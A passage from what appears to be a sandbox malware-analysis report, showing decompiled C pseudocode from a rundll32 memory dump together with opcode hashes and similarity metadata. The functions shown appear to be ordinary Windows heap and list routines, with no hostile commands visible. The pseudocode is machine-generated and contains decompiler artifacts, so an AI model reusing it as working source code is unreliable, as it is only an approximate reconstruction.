                                                                                            				_t68 = 0;
                                                                                            				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
                                                                                            				 *(_t83 - 4) =  *(_t83 - 4) & 0;
                                                                                            				_t7 = _t55 + 8; // 0x8
                                                                                            				_t57 = 6;
                                                                                            				memcpy(_t7, _t79, _t57 << 2);
                                                                                            				_t80 = 0xfffffffe;
                                                                                            				 *(_t83 - 4) = _t80;
                                                                                            				if(0 < 0) {
                                                                                            					L14:
                                                                                            					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                                                                            					L20:
                                                                                            					L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
                                                                                            					_t39 = _t81;
                                                                                            					goto L11;
                                                                                            				}
                                                                                            				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
                                                                                            					_t81 = 0xc000007b;
                                                                                            					goto L20;
                                                                                            				}
                                                                                            				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
                                                                                            					_t59 =  *((intOrPtr*)(_t83 + 8));
                                                                                            					_t45 =  *_t59;
                                                                                            					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
                                                                                            					 *_t59 = _t45 + 1;
                                                                                            					L6:
                                                                                            					 *(_t83 - 4) = 1;
                                                                                            					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
                                                                                            					 *(_t83 - 4) = _t80;
                                                                                            					if(_t68 < 0) {
                                                                                            						_t82 =  *((intOrPtr*)(_t83 + 0xc));
                                                                                            						if(_t82 == 0) {
                                                                                            							goto L14;
                                                                                            						}
                                                                                            						asm("btr eax, ecx");
                                                                                            						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                                                                            						if( *_t82 != 0) {
                                                                                            							 *0x46c7b10 =  *0x46c7b10 - 8;
                                                                                            						}
                                                                                            						goto L20;
                                                                                            					}
                                                                                            					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
                                                                                            					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
                                                                                            					_t51 =  *0x46c536c; // 0x29f0cc0
                                                                                            					if( *_t51 != 0x46c5368) {
                                                                                            						_push(3);
                                                                                            						asm("int 0x29");
                                                                                            						goto L14;
                                                                                            					}
                                                                                            					 *_t55 = 0x46c5368;
                                                                                            					 *((intOrPtr*)(_t55 + 4)) = _t51;
                                                                                            					 *_t51 = _t55;
                                                                                            					 *0x46c536c = _t55;
                                                                                            					_t52 =  *((intOrPtr*)(_t83 + 0x10));
                                                                                            					if(_t52 != 0) {
                                                                                            						 *_t52 = _t55;
                                                                                            					}
                                                                                            					_t39 = 0;
                                                                                            					goto L11;
                                                                                            				}
                                                                                            				_t77 =  *((intOrPtr*)(_t83 + 8));
                                                                                            				_t68 = E0460A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
                                                                                            				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
                                                                                            				if(_t68 < 0) {
                                                                                            					goto L14;
                                                                                            				}
                                                                                            				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
                                                                                            				goto L6;
                                                                                            			}



















                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9d0060fa0238c7b9fdc40e7eba49cb7795177fc87228bbcf78976c7fcb3b1769
                                                                                            • Instruction ID: 4ca70f645c89cc1988f18f8f29ed534146508b1c0ffac85ee213192dabd317dc
                                                                                            • Opcode Fuzzy Hash: 9d0060fa0238c7b9fdc40e7eba49cb7795177fc87228bbcf78976c7fcb3b1769
                                                                                            • Instruction Fuzzy Hash: 6F4149B5A50315DFDB18CFA8C880BAAB7B1FB99304F14C169E804AB380E775B901CF90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 76%
                                                                                            			E04657016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                                                                                            				signed int _v8;
                                                                                            				char _v588;
                                                                                            				intOrPtr _v592;
                                                                                            				intOrPtr _v596;
                                                                                            				signed short* _v600;
                                                                                            				char _v604;
                                                                                            				short _v606;
                                                                                            				void* __ebx;
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				signed short* _t55;
                                                                                            				void* _t56;
                                                                                            				signed short* _t58;
                                                                                            				signed char* _t61;
                                                                                            				char* _t68;
                                                                                            				void* _t69;
                                                                                            				void* _t71;
                                                                                            				void* _t72;
                                                                                            				signed int _t75;
                                                                                            
                                                                                            				_t64 = __edx;
                                                                                            				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                                                                                            				_v8 =  *0x46cd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                                                                                            				_t55 = _a16;
                                                                                            				_v606 = __ecx;
                                                                                            				_t71 = 0;
                                                                                            				_t58 = _a12;
                                                                                            				_v596 = __edx;
                                                                                            				_v600 = _t58;
                                                                                            				_t68 =  &_v588;
                                                                                            				if(_t58 != 0) {
                                                                                            					_t71 = ( *_t58 & 0x0000ffff) + 2;
                                                                                            					if(_t55 != 0) {
                                                                                            						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                                                                                            					}
                                                                                            				}
                                                                                            				_t8 = _t71 + 0x2a; // 0x28
                                                                                            				_t33 = _t8;
                                                                                            				_v592 = _t8;
                                                                                            				if(_t71 <= 0x214) {
                                                                                            					L6:
                                                                                            					 *((short*)(_t68 + 6)) = _v606;
                                                                                            					if(_t64 != 0xffffffff) {
                                                                                            						asm("cdq");
                                                                                            						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                                                                                            						 *((char*)(_t68 + 0x28)) = _a4;
                                                                                            						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                                                                                            						 *((char*)(_t68 + 0x29)) = _a8;
                                                                                            						if(_t71 != 0) {
                                                                                            							_t22 = _t68 + 0x2a; // 0x2a
                                                                                            							_t64 = _t22;
                                                                                            							E04656B4C(_t58, _t22, _t71,  &_v604);
                                                                                            							if(_t55 != 0) {
                                                                                            								_t25 = _v604 + 0x2a; // 0x2a
                                                                                            								_t64 = _t25 + _t68;
                                                                                            								E04656B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                                                                                            							}
                                                                                            							if(E045F7D50() == 0) {
                                                                                            								_t61 = 0x7ffe0384;
                                                                                            							} else {
                                                                                            								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                            							}
                                                                                            							_push(_t68);
                                                                                            							_push(_v592 + 0xffffffe0);
                                                                                            							_push(0x402);
                                                                                            							_push( *_t61 & 0x000000ff);
                                                                                            							E04619AE0();
                                                                                            						}
                                                                                            					}
                                                                                            					_t35 =  &_v588;
                                                                                            					if( &_v588 != _t68) {
                                                                                            						_t35 = L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                                                                                            					}
                                                                                            					L16:
                                                                                            					_pop(_t69);
                                                                                            					_pop(_t72);
                                                                                            					_pop(_t56);
                                                                                            					return E0461B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                                                                                            				}
                                                                                            				_t68 = L045F4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                                                                                            				if(_t68 == 0) {
                                                                                            					goto L16;
                                                                                            				} else {
                                                                                            					_t58 = _v600;
                                                                                            					_t64 = _v596;
                                                                                            					goto L6;
                                                                                            				}
                                                                                            			}























                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4d413512c86ced67032931a1f1650319621b70af0c8364e8b96a1572b6e53724
                                                                                            • Instruction ID: 7d656fd78dea60fafaee4bdeb572a52d2b02be54b108716a223b63a054768982
                                                                                            • Opcode Fuzzy Hash: 4d413512c86ced67032931a1f1650319621b70af0c8364e8b96a1572b6e53724
                                                                                            • Instruction Fuzzy Hash: 0C318F726047519BC320DF68C940A6AB7E9BF98701F044A29FD99877A0E730F914CBA6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 68%
                                                                                            			E045FC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                                                                                            				signed int* _v8;
                                                                                            				char _v16;
                                                                                            				void* __ebx;
                                                                                            				void* __edi;
                                                                                            				signed char _t33;
                                                                                            				signed char _t43;
                                                                                            				signed char _t48;
                                                                                            				signed char _t62;
                                                                                            				void* _t63;
                                                                                            				intOrPtr _t69;
                                                                                            				intOrPtr _t71;
                                                                                            				unsigned int* _t82;
                                                                                            				void* _t83;
                                                                                            
                                                                                            				_t80 = __ecx;
                                                                                            				_t82 = __edx;
                                                                                            				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                                                                                            				_t62 = _t33 >> 0x00000001 & 0x00000001;
                                                                                            				if((_t33 & 0x00000001) != 0) {
                                                                                            					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                                                                                            					if(E045F7D50() != 0) {
                                                                                            						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                            					} else {
                                                                                            						_t43 = 0x7ffe0386;
                                                                                            					}
                                                                                            					if( *_t43 != 0) {
                                                                                            						_t43 = E046A8D34(_v8, _t80);
                                                                                            					}
                                                                                            					E045F2280(_t43, _t82);
                                                                                            					if( *((char*)(_t80 + 0xdc)) == 0) {
                                                                                            						E045EFFB0(_t62, _t80, _t82);
                                                                                            						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                                                                                            						_t30 = _t80 + 0xd0; // 0xd0
                                                                                            						_t83 = _t30;
                                                                                            						E046A8833(_t83,  &_v16);
                                                                                            						_t81 = _t80 + 0x90;
                                                                                            						E045EFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                                                                                            						_t63 = 0;
                                                                                            						_push(0);
                                                                                            						_push(_t83);
                                                                                            						_t48 = E0461B180();
                                                                                            						if(_a4 != 0) {
                                                                                            							E045F2280(_t48, _t81);
                                                                                            						}
                                                                                            					} else {
                                                                                            						_t69 = _v8;
                                                                                            						_t12 = _t80 + 0x98; // 0x98
                                                                                            						_t13 = _t69 + 0xc; // 0x575651ff
                                                                                            						E045FBB2D(_t13, _t12);
                                                                                            						_t71 = _v8;
                                                                                            						_t15 = _t80 + 0xb0; // 0xb0
                                                                                            						_t16 = _t71 + 8; // 0x8b000cc2
                                                                                            						E045FBB2D(_t16, _t15);
                                                                                            						E045FB944(_v8, _t62);
                                                                                            						 *((char*)(_t80 + 0xdc)) = 0;
                                                                                            						E045EFFB0(0, _t80, _t82);
                                                                                            						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                                                                                            						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                                                                                            						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                                                                                            						 *(_t80 + 0xde) = 0;
                                                                                            						if(_a4 == 0) {
                                                                                            							_t25 = _t80 + 0x90; // 0x90
                                                                                            							E045EFFB0(0, _t80, _t25);
                                                                                            						}
                                                                                            						_t63 = 1;
                                                                                            					}
                                                                                            					return _t63;
                                                                                            				}
                                                                                            				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                                                                                            				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                                                                                            				if(_a4 == 0) {
                                                                                            					_t24 = _t80 + 0x90; // 0x90
                                                                                            					E045EFFB0(0, __ecx, _t24);
                                                                                            				}
                                                                                            				return 0;
                                                                                            			}

















                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                            • Instruction ID: e71f32ce575aafc55258a80b3843a44b65691d1492bd37ac2f36c0866988d55d
                                                                                            • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                            • Instruction Fuzzy Hash: 98312672B0154BBEEB05EBF4C880BE9F755BF82208F14416AD61847241EB357A15FBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 92%
                                                                                            			E0460A70E(intOrPtr* __ecx, char* __edx) {
                                                                                            				unsigned int _v8;
                                                                                            				intOrPtr* _v12;
                                                                                            				void* __ebx;
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				void* _t16;
                                                                                            				intOrPtr _t17;
                                                                                            				intOrPtr _t28;
                                                                                            				char* _t33;
                                                                                            				intOrPtr _t37;
                                                                                            				intOrPtr _t38;
                                                                                            				void* _t50;
                                                                                            				intOrPtr _t52;
                                                                                            
                                                                                            				_push(__ecx);
                                                                                            				_push(__ecx);
                                                                                            				_t52 =  *0x46c7b10; // 0x9
                                                                                            				_t33 = __edx;
                                                                                            				_t48 = __ecx;
                                                                                            				_v12 = __ecx;
                                                                                            				if(_t52 == 0) {
                                                                                            					 *0x46c7b10 = 8;
                                                                                            					 *0x46c7b14 = 0x46c7b0c;
                                                                                            					 *0x46c7b18 = 1;
                                                                                            					L6:
                                                                                            					_t2 = _t52 + 1; // 0xa
                                                                                            					E0460A990(0x46c7b10, _t2, 7);
                                                                                            					asm("bts ecx, eax");
                                                                                            					 *_t48 = _t52;
                                                                                            					 *_t33 = 1;
                                                                                            					L3:
                                                                                            					_t16 = 0;
                                                                                            					L4:
                                                                                            					return _t16;
                                                                                            				}
                                                                                            				_t17 = L0460A840(__edx, __ecx, __ecx, _t52, 0x46c7b10, 1, 0);
                                                                                            				if(_t17 == 0xffffffff) {
                                                                                            					_t37 =  *0x46c7b10; // 0x9
                                                                                            					_t3 = _t37 + 0x27; // 0x30
                                                                                            					__eflags = _t3 >> 5 -  *0x46c7b18; // 0x1
                                                                                            					if(__eflags > 0) {
                                                                                            						_t38 =  *0x46c7b9c; // 0x0
                                                                                            						_t4 = _t52 + 0x27; // 0x30
                                                                                            						_v8 = _t4 >> 5;
                                                                                            						_t50 = L045F4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
                                                                                            						__eflags = _t50;
                                                                                            						if(_t50 == 0) {
                                                                                            							_t16 = 0xc0000017;
                                                                                            							goto L4;
                                                                                            						}
                                                                                            						 *0x46c7b18 = _v8;
                                                                                            						_t8 = _t52 + 7; // 0x10
                                                                                            						E0461F3E0(_t50,  *0x46c7b14, _t8 >> 3);
                                                                                            						_t28 =  *0x46c7b14; // 0x77e07b0c
                                                                                            						__eflags = _t28 - 0x46c7b0c;
                                                                                            						if(_t28 != 0x46c7b0c) {
                                                                                            							L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                                                                            						}
                                                                                            						_t9 = _t52 + 8; // 0x11
                                                                                            						 *0x46c7b14 = _t50;
                                                                                            						_t48 = _v12;
                                                                                            						 *0x46c7b10 = _t9;
                                                                                            						goto L6;
                                                                                            					}
                                                                                            					 *0x46c7b10 = _t37 + 8;
                                                                                            					goto L6;
                                                                                            				}
                                                                                            				 *__ecx = _t17;
                                                                                            				 *_t33 = 0;
                                                                                            				goto L3;
                                                                                            			}

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c71cf9f7941e598b0a778936e170cef1e877343f203e49059a9a662c4457b37b
                                                                                            • Instruction ID: e90ca46fa5554b3e940ab3a161825bbe22cad968be618d561341c022aecf50e9
                                                                                            • Opcode Fuzzy Hash: c71cf9f7941e598b0a778936e170cef1e877343f203e49059a9a662c4457b37b
                                                                                            • Instruction Fuzzy Hash: 1F3187B5610202ABD715CF58D880F6ABBF9EBA4751F14895AE01587280F778FE01DF92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 97%
                                                                                            			E046061A0(signed int* __ecx) {
                                                                                            				intOrPtr _v8;
                                                                                            				char _v12;
                                                                                            				intOrPtr* _v16;
                                                                                            				intOrPtr _v20;
                                                                                            				intOrPtr _t30;
                                                                                            				intOrPtr _t31;
                                                                                            				void* _t32;
                                                                                            				intOrPtr _t33;
                                                                                            				intOrPtr _t37;
                                                                                            				intOrPtr _t49;
                                                                                            				signed int _t51;
                                                                                            				intOrPtr _t52;
                                                                                            				signed int _t54;
                                                                                            				void* _t59;
                                                                                            				signed int* _t61;
                                                                                            				intOrPtr* _t64;
                                                                                            
                                                                                            				_t61 = __ecx;
                                                                                            				_v12 = 0;
                                                                                            				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                                                                            				_v16 = __ecx;
                                                                                            				_v8 = 0;
                                                                                            				if(_t30 == 0) {
                                                                                            					L6:
                                                                                            					_t31 = 0;
                                                                                            					L7:
                                                                                            					return _t31;
                                                                                            				}
                                                                                            				_t32 = _t30 + 0x5d8;
                                                                                            				if(_t32 == 0) {
                                                                                            					goto L6;
                                                                                            				}
                                                                                            				_t59 = _t32 + 0x30;
                                                                                            				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
                                                                                            					goto L6;
                                                                                            				}
                                                                                            				if(__ecx != 0) {
                                                                                            					 *((intOrPtr*)(__ecx)) = 0;
                                                                                            					 *((intOrPtr*)(__ecx + 4)) = 0;
                                                                                            				}
                                                                                            				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
                                                                                            					_t51 =  *(_t32 + 0x10);
                                                                                            					_t33 = _t32 + 0x10;
                                                                                            					_v20 = _t33;
                                                                                            					_t54 =  *(_t33 + 4);
                                                                                            					if((_t51 | _t54) == 0) {
                                                                                            						_t37 = E04605E50(0x45b67cc, 0, 0,  &_v12);
                                                                                            						if(_t37 != 0) {
                                                                                            							goto L6;
                                                                                            						}
                                                                                            						_t52 = _v8;
                                                                                            						asm("lock cmpxchg8b [esi]");
                                                                                            						_t64 = _v16;
                                                                                            						_t49 = _t37;
                                                                                            						_v20 = 0;
                                                                                            						if(_t37 == 0) {
                                                                                            							if(_t64 != 0) {
                                                                                            								 *_t64 = _v12;
                                                                                            								 *((intOrPtr*)(_t64 + 4)) = _t52;
                                                                                            							}
                                                                                            							E046A9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
                                                                                            							_t31 = 1;
                                                                                            							goto L7;
                                                                                            						}
                                                                                            						E045DF7C0(_t52, _v12, _t52, 0);
                                                                                            						if(_t64 != 0) {
                                                                                            							 *_t64 = _t49;
                                                                                            							 *((intOrPtr*)(_t64 + 4)) = _v20;
                                                                                            						}
                                                                                            						L12:
                                                                                            						_t31 = 1;
                                                                                            						goto L7;
                                                                                            					}
                                                                                            					if(_t61 != 0) {
                                                                                            						 *_t61 = _t51;
                                                                                            						_t61[1] = _t54;
                                                                                            					}
                                                                                            					goto L12;
                                                                                            				} else {
                                                                                            					goto L6;
                                                                                            				}
                                                                                            			}
                                                                                            0x046476b7
                                                                                            0x046476d7
                                                                                            0x046476dc
                                                                                            0x00000000
                                                                                            0x046476dc
                                                                                            0x046476a2
                                                                                            0x046476a9
                                                                                            0x04647651
                                                                                            0x04647653
                                                                                            0x04647653
                                                                                            0x04647656
                                                                                            0x04647656
                                                                                            0x00000000
                                                                                            0x04647656
                                                                                            0x04647644
                                                                                            0x04647646
                                                                                            0x04647648
                                                                                            0x04647648
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5293d6360e236579d0b43e4db27e2457bbdab0b3efd587f183db83fff220bd00
                                                                                            • Instruction ID: 155119d9a7d6bc4ac54a2858d2caca693171c891962c456c94aed7951cc96f77
                                                                                            • Opcode Fuzzy Hash: 5293d6360e236579d0b43e4db27e2457bbdab0b3efd587f183db83fff220bd00
                                                                                            • Instruction Fuzzy Hash: 273169716057018FD764DF19C800B26B7E5FB98B00F05896DE8989B391E7B0E804CB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 95%
                                                                                            			E045DAA16(signed short* __ecx) {
                                                                                            				signed int _v8;
                                                                                            				intOrPtr _v12;
                                                                                            				signed short _v16;
                                                                                            				intOrPtr _v20;
                                                                                            				signed short _v24;
                                                                                            				signed short _v28;
                                                                                            				void* _v32;
                                                                                            				void* __ebx;
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				intOrPtr _t25;
                                                                                            				signed short _t38;
                                                                                            				signed short* _t42;
                                                                                            				signed int _t44;
                                                                                            				signed short* _t52;
                                                                                            				signed short _t53;
                                                                                            				signed int _t54;
                                                                                            
                                                                                            				_v8 =  *0x46cd360 ^ _t54;
                                                                                            				_t42 = __ecx;
                                                                                            				_t44 =  *__ecx & 0x0000ffff;
                                                                                            				_t52 =  &(__ecx[2]);
                                                                                            				_t51 = _t44 + 2;
                                                                                            				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
                                                                                            					L4:
                                                                                            					_t25 =  *0x46c7b9c; // 0x0
                                                                                            					_t53 = L045F4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
                                                                                            					__eflags = _t53;
                                                                                            					if(_t53 == 0) {
                                                                                            						L3:
                                                                                            						return E0461B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
                                                                                            					} else {
                                                                                            						E0461F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
                                                                                            						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                            						L2:
                                                                                            						_t51 = 4;
                                                                                            						if(L045E6C59(_t53, _t51, _t58) != 0) {
                                                                                            							_t28 = E04605E50(0x45bc338, 0, 0,  &_v32);
                                                                                            							__eflags = _t28;
                                                                                            							if(_t28 == 0) {
                                                                                            								_t38 = ( *_t42 & 0x0000ffff) + 2;
                                                                                            								__eflags = _t38;
                                                                                            								_v24 = _t53;
                                                                                            								_v16 = _t38;
                                                                                            								_v20 = 0;
                                                                                            								_v12 = 0;
                                                                                            								E0460B230(_v32, _v28, 0x45bc2d8, 1,  &_v24);
                                                                                            								_t28 = E045DF7A0(_v32, _v28);
                                                                                            							}
                                                                                            							__eflags = _t53 -  *_t52;
                                                                                            							if(_t53 !=  *_t52) {
                                                                                            								_t28 = L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                                                                            							}
                                                                                            						}
                                                                                            						goto L3;
                                                                                            					}
                                                                                            				}
                                                                                            				_t53 =  *_t52;
                                                                                            				_t44 = _t44 >> 1;
                                                                                            				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
                                                                                            				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
                                                                                            					goto L4;
                                                                                            				}
                                                                                            				goto L2;
                                                                                            			}


                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ab0347a06af800561864b87b3a880a845e2cf3ff498a9f338353c33ce5c0e21a
                                                                                            • Instruction ID: 9bae58ab6951952252eddb19f9d0adde3bbfc214ec8dd7e732659806ac3268b8
                                                                                            • Opcode Fuzzy Hash: ab0347a06af800561864b87b3a880a845e2cf3ff498a9f338353c33ce5c0e21a
                                                                                            • Instruction Fuzzy Hash: 8331C071A0061AABDB159F68CD81ABFB3B8FF44704B044469F905E7250FB34BD11EBA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 58%
                                                                                            			E04614A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                            				signed int _v8;
                                                                                            				signed int* _v12;
                                                                                            				char _v13;
                                                                                            				signed int _v16;
                                                                                            				char _v21;
                                                                                            				signed int* _v24;
                                                                                            				void* __ebx;
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				signed int _t29;
                                                                                            				signed int* _t32;
                                                                                            				signed int* _t41;
                                                                                            				signed int _t42;
                                                                                            				void* _t43;
                                                                                            				intOrPtr* _t51;
                                                                                            				void* _t52;
                                                                                            				signed int _t53;
                                                                                            				signed int _t58;
                                                                                            				void* _t59;
                                                                                            				signed int _t60;
                                                                                            				signed int _t62;
                                                                                            
                                                                                            				_t49 = __edx;
                                                                                            				_t62 = (_t60 & 0xfffffff8) - 0xc;
                                                                                            				_t26 =  *0x46cd360 ^ _t62;
                                                                                            				_v8 =  *0x46cd360 ^ _t62;
                                                                                            				_t41 = __ecx;
                                                                                            				_t51 = __edx;
                                                                                            				_v12 = __ecx;
                                                                                            				if(_a4 == 0) {
                                                                                            					if(_a8 != 0) {
                                                                                            						goto L1;
                                                                                            					}
                                                                                            					_v13 = 1;
                                                                                            					E045F2280(_t26, 0x46c8608);
                                                                                            					_t58 =  *_t41;
                                                                                            					if(_t58 == 0) {
                                                                                            						L11:
                                                                                            						E045EFFB0(_t41, _t51, 0x46c8608);
                                                                                            						L2:
                                                                                            						 *0x46cb1e0(_a4, _a8);
                                                                                            						_t42 =  *_t51();
                                                                                            						if(_t42 == 0) {
                                                                                            							_t29 = 0;
                                                                                            							L5:
                                                                                            							_pop(_t52);
                                                                                            							_pop(_t59);
                                                                                            							_pop(_t43);
                                                                                            							return E0461B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
                                                                                            						}
                                                                                            						 *((intOrPtr*)(_t42 + 0x34)) = 1;
                                                                                            						if(_v21 != 0) {
                                                                                            							_t53 = 0;
                                                                                            							E045F2280(_t28, 0x46c8608);
                                                                                            							_t32 = _v24;
                                                                                            							if( *_t32 == _t58) {
                                                                                            								 *_t32 = _t42;
                                                                                            								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
                                                                                            								if(_t58 != 0) {
                                                                                            									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
                                                                                            									asm("sbb edi, edi");
                                                                                            									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
                                                                                            								}
                                                                                            							}
                                                                                            							E045EFFB0(_t42, _t53, 0x46c8608);
                                                                                            							if(_t53 != 0) {
                                                                                            								L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                                                                            							}
                                                                                            						}
                                                                                            						_t29 = _t42;
                                                                                            						goto L5;
                                                                                            					}
                                                                                            					if( *((char*)(_t58 + 0x40)) != 0) {
